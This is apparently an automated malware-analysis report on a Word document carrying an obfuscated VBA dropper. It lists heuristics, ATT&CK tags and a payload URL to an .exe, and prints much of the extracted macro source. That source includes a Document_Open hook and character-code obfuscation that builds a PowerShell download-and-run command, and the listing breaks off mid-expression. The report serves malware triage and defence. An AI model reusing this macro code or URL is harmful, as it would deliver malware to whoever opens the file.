MALICIOUS
Risk Score: 272
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an Office document containing VBA macros, specifically a Document_Open macro that calls a shell execution function. Heuristics indicate a macro-enable lure and ClamAV detections confirm it is a dropper. The VBA code is heavily obfuscated, but the presence of a Document_Open macro and the shell call strongly suggest it's designed to download and execute a second-stage payload.
Heuristics 8
- ClamAV: Doc.Dropper.Agent-6837211-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6837211-0
- VBA project inside OOXML (medium, 3 related findings, OOXML_VBA): Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  vPID = Shell(itah, 1.1 / 1.1 * 1.1 - 1.1)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script:
  Private Sub Document_Open()
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URLs:
- https://mfae.info/newwork/fresh/soft.exe : In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 34022 bytes |

SHA-256: 0d859e15b2434d05b0e442768c79cdbc7674e411c74639d9ef831c18d03717f5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
220 of 363 identifiers look randomly generated (e.g. 'iwwnhwibhhtlmyqtwbftwwzcxbidqrwirzacwowp') — consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call pcxqujdhubpxk
End Sub
Private Sub pcxqujdhubpxk()
Dim er23405356234 As Byte
Dim uevfuvsexuj As Date
Dim atp
Dim cnwlbgsitp
If 0 = 23 Then
Else
Dim wezzglfqlidvpdj
Dim ktjtqmqf
Dim ychkhyc As Variant
Dim lrsjqzfnfgszyogr As Date
Dim uemjcvawblluyw
Dim zzbpzdke
Dim zhlwnlilbsrav
lrsjqzfnfgszyogr = 44
Do While 675 < 5
Select Case gsjgpz
Case "¢µñð?ÈäÍɵ?ó¨§", "«¼ôð?ÆçËÖ²?å°", "?ÃÛð?°ö½Ü±?ë??Äì"
kmjbutl = "?Éðó?¶"
Case "§ºñë?Â", "©³æò Çî¶Õ¤?à«�ÔÖ"
suffix = "?ÊÞè?½ò¿Ò¦?î°¦Ó×"
Case "?¸ã", "?Ëáó�¯ê¹Î®?Û®§ÂÖ"
kmjbutl = "§¸ôé?¼ó½×®?å¤?"
Case Else
lxtpcxu = "uytpohlhfxynor"
End Select
Dim mrdlgmohddaior
Dim zohiilgbfiufvvc
Dim uxivczfzemzz
Exit Do
Randomize
Loop
Dim ptshguapqpwijar As Variant
Dim sxvc As Date
Dim mfesg
Dim iljfsutra
Dim ivnunjxlyj
sxvc = 14
Do While 466 < 1
Select Case gbsqpgssnxqptzs
Case "?¼ñß?ÃìÍÏ �", " Ãè", "�ºôæ¤"
ievbkqlplekxse = "?²ëì?¿ß¶Éª?ñ§¤Ñ"
Case "«¸Ý÷?»æÇÓª?Û©¤Îè", "©·ßñ£°í¸Ø´?Ú?"
suffix = "«Åßß"
Case " ¼éê?ÇïÍÓ?", "?Ãëî?"
ievbkqlplekxse = "?ºÜç?Ä"
Case Else
urupfclpqorfnv = "soqtrnedgjueyk"
End Select
Dim hyhrj
Dim hjnzz
Dim wubqzhxkgftovv
Exit Do
Randomize
Loop
Dim vcmnigkb As Variant
Dim jzdcubvpoosbjsfm As Date
Dim eisyfupxikhigebr
Dim nohcokko
Dim oktqhyxoltgjgo
jzdcubvpoosbjsfm = 73
Do While 539 < 4
Select Case wvsmj
Case "£²Üì ÃîÆÉ³ éª", "£Ëàì¡ÆäÀÎ", "?¹åæ?»òÄÊ??àª"
dojnmd = "?Ääë?½ê¶"
Case "?¹îá¢ÅîÁס?ï£?Íä", "¡²ãå "
suffix = "¦Çêï¤ÇÞ»Ö£"
Case "?¶Ûê Âé¹Ô´ ë??", " ÆÝí?¶äÄÕ´?è?�"
dojnmd = "©Ãê"
Case Else
nbtgtsrumqc = "sbzjzeob"
End Select
Dim vfcdfkwblup
Dim zapwqycogfs
Dim kcuxal
Exit Do
Randomize
Loop
Dim zugoboovhjj As Variant
Dim tljtjknixcxgh As Date
Dim gblsfugmpujt
Dim djzufbrldjhsq
Dim mmzxoiwamnzqcnt
tljtjknixcxgh = 39
Do While 551 < 7
Select Case nprxg
Case "?Åèå?Å", "?Âîë?·æ¶Ï«", "¥¹ñæ�Åî¹Ú¥"
uemyxtnrtvvcfunr = "?´Ýâ?¸ÞÉÛ"
Case "¦Àäô?Èë¹Ò?", "£»é÷?°ã¾Û³?ó®"
suffix = "?Éßè?Ãï¿Ú¯?ì?"
Case "?¸Ûì�¼àÍÙ´?ð", "?Åèß�½å½Ù³"
uemyxtnrtvvcfunr = "?¼äö?¸óÍÒ¨?Þ"
Case Else
sgynjyhtgtzd = "bblaifn"
End Select
Dim tzwq
Dim gehsphjmduzgo
Dim nnkhznt
Exit Do
Randomize
Loop
End If
If 9 = 8 Then
Dim xecjlupnnv
Else
Dim kcmkeczh
Dim qspwmwppsgseidp As String
qspwmwppsgseidp = "OBuQeWb"
Dim evflykb As String
evflykb = "fmqWdknDV"
Dim dldtemwrqm As String
dldtemwrqm = "."
Application.Run qspwmwppsgseidp & dldtemwrqm & evflykb
End If
Dim qgiv
Dim utdvkxq
End Sub
Attribute VB_Name = "OBuQeWb"
Const qmfrughwvlxgcva = 1
Const vzeslgdnsppz = 2924
Const diijapedgholvvn = 71
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function whyyubwthaztp Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function wqpab Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function djonudaycnalpn Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function hnwhbncsrigt Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function tvvynokhh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function nymtdmj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function whyyubwthaztp Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function wqpab Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function djonudaycnalpn Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function hnwhbncsrigt Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function tvvynokhh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function nymtdmj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const chammdlaa = 4
Const dnnujgumg = 5
Private Const hrs = 69
Const zaxtlaplntx = 6834291
Private Const vxunbboore = 2924
Const ojppiuyz = 941287083
Const lcecanqfnalclo = 783
Const xhar = 97
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function axrmqjyeevyx Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function pydbawvh Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function sadghrco Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function pvbnsrhgyurk Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function bemaoabkh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function pfsxmsjkcjo Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function axrmqjyeevyx Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function pydbawvh Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function sadghrco Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function pvbnsrhgyurk Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function bemaoabkh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function pfsxmsjkcjo Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const wzpixvilvcdd = 4
Const dwqekmc = 7
Private Const iirx = 96
Const sjxmdawegyag = 45
Private Const fturodlx = 783
Const ixtwtmmn = 496697748
Const fkehgvhmrsnewujo = 6821
Const korsjemojth = 94
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function izdqtffqlihux Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function cvdehk Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function dzcvml Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function lyxnopdugnoyp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function qnmbwvmcpbw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function rjtfkfovawu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function izdqtffqlihux Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function cvdehk Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function dzcvml Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function lyxnopdugnoyp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function qnmbwvmcpbw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function rjtfkfovawu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const xoi = 7
Const gcbu = 3
Private Const yhzsjcyefaznech = 81
Const vgaavsmofhik = 48147879
Private Const cwiqlzgnjfd = 6821
Const mzrfademvp = 2277189
Const zvbluk = 1
Const misnxjoavjh = 25
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function ewahtrvnoyrebg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function iqwesbhhuksn Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function ooamycpdyloxhnx Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function jbxifj Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function lptnjyicgccdp Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function mprlqvttjfv Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function ewahtrvnoyrebg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function iqwesbhhuksn Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function ooamycpdyloxhnx Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function jbxifj Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function lptnjyicgccdp Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function mprlqvttjfv Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const zqotlyzohmumraz = 2
Const ipgkxdmcytzcykz = 1
Private Const ruwmwfgdhqo = 52
Const nibzjguax = 0
Private Const bpmxxhg = 1
Const mule = 2
Const rcohaarkqjdagga = 37687435
Const cfxshcgglfzjjnim = 39
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function wrapexejdgsvuovt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rsi Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function uaugvyxuiq Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function yllcpo Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function lllngvgmdzmmn Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function hkrilgmjfhu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function wrapexejdgsvuovt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function rsi Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function uaugvyxuiq Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function yllcpo Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function lllngvgmdzmmn Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function hkrilgmjfhu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const uaovsbh = 5
Const zadqhtw = 2
Private Const hgn = 99
Const acnydu = 3
Private Const cgdrvohydw = 37687435
Const gna = 707733492
Const utww = 395864979
Const witfhojqgxswe = 88
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function veexg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rgaozpwlddidy Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function hmoivj Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rqgjdepcudgyon Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function xaqknqjrz Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function ojyymbzextfs Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function veexg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function rgaozpwlddidy Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function hmoivj Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function rqgjdepcudgyon Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function xaqknqjrz Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function ojyymbzextfs Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const dqmkmhcyprhbcgva = 8
Const sjsygiivmci = 1
Private Const yevmbett = 32
Const devbbqiqvyko = 174163
Private Const mkbtkhgf = 395864979
Public Sub fmqWdknDV()
On Error Resume Next
NgoIBOB
Dim yjd As Integer
Dim wwhvtercjfmkukj As Double
Dim vxbg As Boolean
Dim vkrkoafuph As String
Dim ecekswuhy As String
Dim weEqXkJyxoptnhzRAQmkOCDONMN As Integer
Dim fzhyzhmrpfdjvvux As String
Dim ebqhktiqs As Boolean
Dim mixoftlgb As Double
Do Until 4810 = 4810
Dim jkethpsvqynxe
jkethpsvqynxe = wexk
Loop
Dim kzeyzask(863) As String
kzeyzask(2) = "?·ó礱ßÈΣ?"
kzeyzask(4) = "¨Çóñ?È"
kzeyzask(1) = "ªµÜá?·ßÊÔ®"
kzeyzask(4) = CStr(73)
If roxytcmy = "�Éèê ÂáÈß´?" Then
Dim yjd73
yjd73 = 6421642182#
End If
Select Case 17
Case Else
End Select
'kzeyzaskmixoftlgb2415ªµÜá?·ßÊÔ®
'?·ó礱ßÈΣ?¨Çóñ?Èvkrkoafuph
'ebqhktiqsvxbg71449
'7373
'vxbgmixoftlgb71449
'ecekswuhyvkrkoafuph2415
'weEqXkJyxoptnhzRAQmkOCDONMNecekswuhy010647
'ebqhktiqsvkrkoafuph
'yjdecekswuhy#Q14
'vkrkoafuphroxytcmy
'010647ecekswuhy
'2415ebqhktiqs
'731748973
'71449mixoftlgb
For avkoon = 1 To 2415
avkoon = avkoon + 7
Next
For blxrykxysi = 1 To 73
blxrykxysi = blxrykxysi + 7
Next
For cufbzpjuoejumsgjo = 1 To 7317489
cufbzpjuoejumsgjo = cufbzpjuoejumsgjo + 7
Next
For Each mxzetiebeoeuksh In ajtlxgm
If IsDate(aivlkbowk) And ((7317489 + 2415) / (10647 + 5273)) <> 933437780781# Then
yknaznxxzgtozfes = "mymizx" & CStr("wjjta")
End If
Next
For vzjiqfitvyiuflcp = 1 To 71449
vzjiqfitvyiuflcp = vzjiqfitvyiuflcp + 7
Next
For fdanma = 1 To 1
fdanma = fdanma + 8
Next
For ymrugiesrurrfq = 1 To 1
ymrugiesrurrfq = ymrugiesrurrfq + 7
Next
For niuhaaeuwzmgs = 1 To 10647
niuhaaeuwzmgs = niuhaaeuwzmgs + 7
Next
'vkoondanmadanmalxrykxysiknhho
'lxrykxysiknhhoxzetiebeoeukshdkuqpikivclxrykxysi
'ufbzpjuoejumsgjolxrykxysilxrykxysiknhho
'zjiqfitvyiuflcpxzetiebeoeukshmrugiesrurrfqknhho
'danmaxzetiebeoeukshiuhaaeuwzmgslxrykxysi
'mrugiesrurrfqknhhoxzetiebeoeukshdkuqpikivclxrykxysi
'iuhaaeuwzmgslxrykxysidkuqpikivclxrykxysi
'xzetiebeoeukshdkuqpikivclxrykxysi
'jkethpsvqynxezjiqfitvyiuflcpdanmadkuqpikivclxrykxysi
'wexkdanmaknhho
'pkjndofbjiwqwxzetiebeoeukshbxooxzjiqfitvyiuflcp
'dkuqpikivclxrykxysidkuqpikivclxrykxysi
'knhhoiuhaaeuwzmgslxrykxysi
'tytpuhdanmamrugiesrurrfqknhho
'bxooxzjiqfitvyiuflcpmrugiesrurrfqknhho
'ªµÜá?·ßÊÔ®Q14
'¨Çóñ?ÈQ11
Dim zlsrxk As Integer
Dim ale As Double
Dim wsbqemctxbhsmrle As Boolean
Dim rhjqtu As String
Dim naknxcg As String
Dim nSFkfwKdEbnRoIGLKVEeVHDkiTn As Integer
Dim laiwzcx As String
Dim mhqgvtzzvebizh As Boolean
Dim fbij As Double
Do Until 5701 = 5701
Dim fbvi
fbvi = nykjsq
Loop
Dim yrgyfuhhittdromb(475) As String
yrgyfuhhittdromb(7) = "©½ëß?ÀÞ¹ß "
yrgyfuhhittdromb(5) = "«¼òõ?ÈçºÜµ?á¯?Æ"
yrgyfuhhittdromb(2) = "£³ñð?¼éÇȱ?ï¦?"
yrgyfuhhittdromb(3) = CStr(22)
If oyxbbe = " ¿ëï?ÅëÈÙ±?å°?Ì" Then
Dim zlsrxk22
zlsrxk22 = 51078185012685#
End If
Select Case 46
Case Else
End Select
'yrgyfuhhittdrombfbij42£³ñð?¼éÇȱ?ï¦?
'©½ëß?ÀÞ¹ß «¼òõ?ÈçºÜµ?á¯?Ærhjqtu
'mhqgvtzzvebizhwsbqemctxbhsmrle6155809
'2222
'wsbqemctxbhsmrlefbij6155809
'naknxcgrhjqtu42
'nSFkfwKdEbnRoIGLKVEeVHDkiTnnaknxcg1
'mhqgvtzzvebizhrhjqtu
'zlsrxknaknxcg#Q14
'rhjqtuoyxbbe
'1naknxcg
'42mhqgvtzzvebizh
'953071422
'6155809fbij
For azasjpmpxiaoelu = 1 To 42
azasjpmpxiaoelu = azasjpmpxiaoelu + 3
Next
For bupmlvcjqwgfaagmj = 1 To 22
bupmlvcjqwgfaagmj = bupmlvcjqwgfaagmj + 8
Next
For cdplno = 1 To 9530714
cdplno = cdplno + 1
Next
For Each mwgosbrwexut In lhucnapytca
If IsDate(poqiohmcxf) And ((9530714 + 42) / (1 + 24086501)) <> 34149214059985# Then
mxxwelscx = "spfwebc" & CStr("ziqy")
End If
Next
For vhincbppgthyjoptk = 1 To 6155809
vhincbppgthyjoptk = vhincbppgthyjoptk + 1
Next
For fqqf = 1 To 5108944
fqqf = fqqf + 4
Next
For yayf = 1 To 5108944
yayf = yayf + 6
Next
For nypunfonchbzgo = 1 To 1
nypunfonchbzgo = nypunfonchbzgo + 1
Next
'zasjpmpxiaoeluqqfqqfupmlvcjqwgfaagmjfwgpxjgli
'upmlvcjqwgfaagmjfwgpxjgliwgosbrwexutzlfzbupmlvcjqwgfaagmj
'dplnoupmlvcjqwgfaagmjupmlvcjqwgfaagmjfwgpxjgli
'hincbppgthyjoptkwgosbrwexutayffwgpxjgli
'qqfwgosbrwexutypunfonchbzgoupmlvcjqwgfaagmj
'ayffwgpxjgliwgosbrwexutzlfzbupmlvcjqwgfaagmj
'ypunfonchbzgoupmlvcjqwgfaagmjzlfzbupmlvcjqwgfaagmj
'wgosbrwexutzlfzbupmlvcjqwgfaagmj
'fbvihincbppgthyjoptkqqfzlfzbupmlvcjqwgfaagmj
'nykjsqqqffwgpxjgli
'kgmsjawgosbrwexutvzoqybxwpvswrhincbppgthyjoptk
'zlfzbupmlvcjqwgfaagmjzlfzbupmlvcjqwgfaagmj
'fwgpxjgliypunfonchbzgoupmlvcjqwgfaagmj
'bjxwildqqfayffwgpxjgli
'vzoqybxwpvswrhincbppgthyjoptkayffwgpxjgli
'£³ñð?¼éÇȱ?ï¦?Q14
'«¼òõ?ÈçºÜµ?á¯?ÆQ11
Dim ychkhyc As Variant
Dim lrsjqzfnfgszyogr As Date
Dim uemjcvawblluyw
Dim zzbpzdke
Dim zhlwnlilbsrav
lrsjqzfnfgszyogr = 44
Do While 675 < 5
Select Case gsjgpz
Case "¢µñð?ÈäÍɵ?ó¨§", "«¼ôð?ÆçËÖ²?å°", "?ÃÛð?°ö½Ü±?ë??Äì"
kmjbutl = "?Éðó?¶"
Case "§ºñë?Â", "©³æò Çî¶Õ¤?à«�ÔÖ"
suffix = "?ÊÞè?½ò¿Ò¦?î°¦Ó×"
Case "?¸ã", "?Ëáó�¯ê¹Î®?Û®§ÂÖ"
kmjbutl = "§¸ôé?¼ó½×®?å¤?"
Case Else
lxtpcxu = "uytpohlhfxynor"
End Select
Dim mrdlgmohddaior
Dim zohiilgbfiufvvc
Dim uxivczfzemzz
Exit Do
Randomize
Loop
Dim ptshguapqpwijar As Variant
Dim sxvc As Date
Dim mfesg
Dim iljfsutra
Dim ivnunjxlyj
sxvc = 14
Do While 466 < 1
Select Case gbsqpgssnxqptzs
Case "?¼ñß?ÃìÍÏ �", " Ãè", "�ºôæ¤"
ievbkqlplekxse = "?²ëì?¿ß¶Éª?ñ§¤Ñ"
Case "«¸Ý÷?»æÇÓª?Û©¤Îè", "©·ßñ£°í¸Ø´?Ú?"
suffix = "«Åßß"
Case " ¼éê?ÇïÍÓ?", "?Ãëî?"
ievbkqlplekxse = "?ºÜç?Ä"
Case Else
urupfclpqorfnv = "soqtrnedgjueyk"
End Select
Dim hyhrj
Dim hjnzz
Dim wubqzhxkgftovv
Exit Do
Randomize
Loop
Dim vcmnigkb As Variant
Dim jzdcubvpoosbjsfm As Date
Dim eisyfupxikhigebr
Dim nohcokko
Dim oktqhyxoltgjgo
jzdcubvpoosbjsfm = 73
Do While 539 < 4
Select Case wvsmj
Case "£²Üì ÃîÆÉ³ éª", "£Ëàì¡ÆäÀÎ", "?¹åæ?»òÄÊ??àª"
dojnmd = "?Ääë?½ê¶"
Case "?¹îá¢ÅîÁס?ï£?Íä", "¡²ãå "
suffix = "¦Çêï¤ÇÞ»Ö£"
Case "?¶Ûê Âé¹Ô´ ë??", " ÆÝí?¶äÄÕ´?è?�"
dojnmd = "©Ãê"
Case Else
nbtgtsrumqc = "sbzjzeob"
End Select
Dim vfcdfkwblup
Dim zapwqycogfs
Dim kcuxal
Exit Do
Randomize
Loop
Dim zugoboovhjj As Variant
Dim tljtjknixcxgh As Date
Dim gblsfugmpujt
Dim djzufbrldjhsq
Dim mmzxoiwamnzqcnt
tljtjknixcxgh = 39
Do While 551 < 7
Select Case nprxg
Case "?Åèå?Å", "?Âîë?·æ¶Ï«", "¥¹ñæ�Åî¹Ú¥"
uemyxtnrtvvcfunr = "?´Ýâ?¸ÞÉÛ"
Case "¦Àäô?Èë¹Ò?", "£»é÷?°ã¾Û³?ó®"
suffix = "?Éßè?Ãï¿Ú¯?ì?"
Case "?¸Ûì�¼àÍÙ´?ð", "?Åèß�½å½Ù³"
uemyxtnrtvvcfunr = "?¼äö?¸óÍÒ¨?Þ"
Case Else
sgynjyhtgtzd = "bblaifn"
End Select
Dim tzwq
Dim gehsphjmduzgo
Dim nnkhznt
Exit Do
Randomize
Loop
a = Left("EYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
'Right function
b = Left("PYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
c = Left("OYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
f = Right("HYpEvwWiGz MDmnQXPDN VCClJPxBuT", 1)
'Mid function
q = Mid("EYpEvwWiGz MDmnQXPDN VCClJPxBut", 1, 11)
'Split function
d = Split("EYpEvwWiGz MDmnQXPDN VCClJPxBut", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next
itah = ChrW(Log(1.55284552845528) - Log(0.285714285714286) + 96.9771479588304) & ChrW(Log(1.36585365853659) - Log(0.363636363636364) + 107.346619464291) & ChrW(Log(0.317073170731707) + Log(0.558441558441558) + 101.401228015403) & ChrW(Log(1.2520325203252) - Log(0.506493506493506) + 30.7649879772348) & ChrW(Log(1.99186991869919) - Log(0.896103896103896) + 45.8712272275713) & ChrW(Log(1.30081300813008) - Log(0.454545454545455) + 97.6185531797743) & _
" " & _
"" & _
b & c & Chr((Abs(-119))) & a & Chr((Abs(-114))) & Chr((Abs(-115))) & Chr((Abs(-104))) & a & Chr(108) & Chr(108) & _
ChrW(Log(1.21951219512195) + Log(0.142857142857143) + 41.4174592103315) & ChrW(Log(1.48780487804878) - Log(0.636363636363636) + 76.8207130787879) & ChrW(Log(2.1869918699187) + Log(0.480519480519481) + 100.62036048498) & ChrW(Log(1.84552845528455) - Log(0.597402597402597) + 117.542070312526) & ChrW(Log(1.15447154471545) - Log(0.779220779220779) + 44.2768964381396) & _
"Object " & _
ChrW(Log(1.55284552845528) - Log(0.909090909090909) + 82.1346007475215) & ChrW(Log(1.1869918699187) - Log(0.155844155844156) + 118.639678961598) & ChrW(Log(1.40650406504065) + Log(0.324675324675325) + 115.45382235786) & ChrW(Log(1.02439024390244) + Log(0.961038961038961) + 115.68564277707) & ChrW(Log(1.56910569105691) + Log(0.194805194805195) + 101.855249387219) & ChrW(Log(2.31707317073171) - Log(0.727272727272727) + 107.511241443985) & _
